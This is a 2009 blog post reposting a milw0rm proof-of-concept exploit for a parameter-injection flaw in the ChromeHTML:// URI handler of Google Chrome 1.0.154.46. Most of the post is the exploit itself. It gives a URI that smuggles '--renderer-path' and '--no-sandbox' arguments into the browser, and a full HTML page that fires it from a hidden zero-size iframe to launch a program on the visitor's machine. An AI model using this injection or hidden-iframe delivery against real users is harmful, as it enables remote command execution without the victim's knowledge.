Milw0rm released a Google Chrome 1.0.154.46 (ChromeHTML://) Parameter Injection PoC [ by waraxe]
****The following is copied and pasted from http://www.milw0rm.com/exploits/7935****
Try this:
chromehtml:"%20--renderer-path="calc"%20--no-sandbox
Disabling sandbox does matter :)
Tested with Google Chrome Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ...
Full PoC:
< html > < head >< title >Chrome URI Handler Remote Command Execution PoC< / title >< / head >
< body >
< h3 >This is a test< / h3 >
< iframe src='chromehtml:"%20--renderer-path="calc"%20--no-sandbox' width=0 height=0 >< / iframe >
< / body>< / html>
# milw0rm.com [2009-01-30]
Friday, January 30, 2009
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment